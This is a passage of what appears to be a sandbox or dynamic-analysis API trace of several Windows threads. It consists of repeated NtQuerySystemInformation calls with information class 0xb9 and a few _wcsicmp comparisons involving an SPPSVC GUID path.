SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe030, Length=0x28, ResultLength=0x0) [0303.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x20, ResultLength=0x0) [0303.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf10, Length=0x20, ResultLength=0x0) [0303.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf10, Length=0x20, ResultLength=0x0) [0303.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf10, Length=0x20, ResultLength=0x0) [0303.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x20, ResultLength=0x0) [0303.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf20, Length=0x20, ResultLength=0x0) [0303.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf20, Length=0x20, ResultLength=0x0) [0303.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe320, Length=0x28, ResultLength=0x0) [0303.923] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0303.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe100, Length=0x28, ResultLength=0x0) [0303.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe100, Length=0x28, ResultLength=0x0) [0303.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe100, Length=0x28, ResultLength=0x0) [0303.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe170, Length=0x28, ResultLength=0x0) [0303.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1f0, Length=0x28, ResultLength=0x0) [0303.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1f0, Length=0x28, ResultLength=0x0) [0303.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe150, Length=0x20, ResultLength=0x0) [0303.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x20, ResultLength=0x0) [0303.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x20, ResultLength=0x0) [0303.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x20, ResultLength=0x0) [0303.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe150, Length=0x20, ResultLength=0x0) [0303.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0e0, Length=0x20, ResultLength=0x0) [0303.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0e0, Length=0x20, ResultLength=0x0) [0303.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe320, Length=0x28, ResultLength=0x0) [0303.946] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0303.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe100, Length=0x28, ResultLength=0x0) [0303.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe100, Length=0x28, ResultLength=0x0) [0303.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe100, Length=0x28, ResultLength=0x0) [0303.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe170, Length=0x28, ResultLength=0x0) [0303.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1f0, Length=0x28, ResultLength=0x0) [0303.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1f0, Length=0x28, ResultLength=0x0) [0303.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe150, Length=0x20, ResultLength=0x0) [0303.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x20, ResultLength=0x0) [0303.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x20, ResultLength=0x0) [0303.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x20, ResultLength=0x0) [0303.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe150, Length=0x20, ResultLength=0x0) [0303.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0e0, Length=0x20, ResultLength=0x0) [0303.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0e0, Length=0x20, ResultLength=0x0) [0303.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) Thread: id = 636 os_tid = 0xf5c [0266.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0266.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781f7f8a0, Length=0x48, ResultLength=0x0) [0266.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0266.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0266.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) Thread: id = 637 os_tid = 0x11a0 Thread: id = 678 os_tid = 0xf2c [0238.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f650, Length=0x50, ResultLength=0x0) [0238.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f5d0, Length=0x28, ResultLength=0x0) [0238.011] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f650, Length=0x50, ResultLength=0x0) [0238.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f650, Length=0x50, ResultLength=0x0) [0238.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f650, Length=0x50, ResultLength=0x0) [0238.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3b0, Length=0x28, ResultLength=0x0) [0238.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3b0, Length=0x28, ResultLength=0x0) [0238.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3b0, Length=0x28, ResultLength=0x0) [0238.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f420, Length=0x28, ResultLength=0x0) [0238.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f4a0, Length=0x28, ResultLength=0x0) [0238.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f4a0, Length=0x28, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f400, Length=0x20, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f380, Length=0x20, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f380, Length=0x20, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f380, Length=0x20, ResultLength=0x0) [0238.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f400, Length=0x20, ResultLength=0x0) [0238.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f390, Length=0x20, ResultLength=0x0) [0238.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f390, Length=0x20, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f650, Length=0x50, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f5d0, Length=0x28, ResultLength=0x0) [0238.020] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f650, Length=0x50, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f650, Length=0x50, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f650, Length=0x50, ResultLength=0x0) [0238.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3b0, Length=0x28, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3b0, Length=0x28, ResultLength=0x0) [0238.023] 